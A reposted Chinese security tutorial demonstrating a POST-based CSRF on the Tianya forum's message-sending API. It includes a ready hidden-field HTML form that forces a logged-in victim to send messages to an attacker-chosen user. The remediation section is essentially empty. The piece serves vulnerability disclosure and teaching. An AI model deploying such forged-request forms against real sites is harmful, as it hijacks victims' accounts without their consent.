网站地图    收藏   

主页 > 后端 > 网站安全 >

天涯CSRF系列二: 劫持用户发送消息给任意用户

来源:自学PHP网    时间:2015-04-17 10:16 作者: 阅读:

[导读] 在CSRF攻击流行之初,曾经有一种错误的观点,认为CSRF攻击只能由GET请求发起,因此很多开发者都认为只要把重要的操作改成只允许POST请求,就能防止CSRF攻击。上次说到GET请求的CSRF(h...

在CSRF攻击流行之初,曾经有一种错误的观点,认为CSRF攻击只能由GET请求发起,因此很多开发者都认为只要把重要的操作改成只允许POST请求,就能防止CSRF攻击。

上次说到GET请求的CSRF(http://www.2cto.com/Article/201310/248996.html),这次我们来看看POST请求的CSRF怎么利用。POST相对GET来说,威力略逊,不是说他们两的危害相差较大。而是说POST的感染范围并没有GET那么广泛。 

天涯有一个叫发送消息的功能:
 
 
抓一下包子:
发现三个可控参数:
 
params.receiveUserName:lisniuse
 
params.content:test
 
params.sourceName:消息
 
 
 
和一个指向URL
 
Request URL:http://www.tianya.cn/api/msg?method=messageuser.insertmessage
 
 
 
根据这3个参数和URL我们构造一个post的payload.html
 
 
<form action="http://www.tianya.cn/api/msg?method=messageuser.insertmessage" method="post" >
        <input type="hidden" name="params.receiveUserName" value="lisniuse">
        <input type="hidden" name="params.content" value="csrf">
        <input type="hidden" name="params.sourceName" value="消息">
        <input type="submit" value="ok">
</form>

 

 
 
本地测试一下
 




 
修复方案:

幸苦你们了 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论